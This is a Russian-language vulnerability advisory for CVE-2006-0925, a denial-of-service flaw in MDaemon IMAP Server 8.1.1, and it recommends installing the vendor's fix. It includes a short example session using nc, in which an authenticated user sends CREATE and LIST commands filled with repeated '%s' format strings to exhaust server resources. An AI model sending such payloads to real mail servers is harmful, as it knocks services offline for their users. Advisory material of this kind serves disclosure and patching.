| Дата публикации: | 24.02.2006 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 2395 |
| Опасность: | Низкая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | CVE-2006-0925 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | MDaemon 8.x |
| Уязвимые версии: MDaemon IMAP Server 8.1.1
Описание: Уязвимость существует при обработке входных данных в команде LIST. Удаленный авторизованный пользователь может с помощью специально сформированного аргумента заставить приложение потреблять все доступные ресурсы на системе. Пример:
M:\Distrib\nc>nc -v 127.0.0.1 143 Blaster [127.0.0.1] 143 (imap) open * OK hack.com IMAP4rev1 MDaemon 8.1.1 ready 0001 LOGIN "densen" "console" 0001 OK LOGIN completed 0003 CREATE "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s% s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s" 0003 OK CREATE completed 0004 LIST "%s%s%s%s%s%s%s" "%s" URL производителя: www.altn.com Решение: Установите исправление с сайта производителя. Источник: |
|
| Ссылки: | Уязвимость MDaemon IMAP Server v.8.1.1 |